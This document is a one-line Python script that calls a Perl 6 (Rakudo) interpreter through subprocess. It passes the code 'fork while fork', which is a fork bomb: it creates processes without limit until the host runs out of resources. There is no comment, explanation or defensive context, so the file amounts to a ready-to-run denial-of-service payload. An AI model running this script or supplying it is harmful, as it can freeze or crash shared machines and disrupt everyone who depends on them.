#!/usr/local/bin/python3 import subprocess;print(subprocess.call(["/friends/.rakudobrew/bin/perl6", "-e", "fork while fork"]))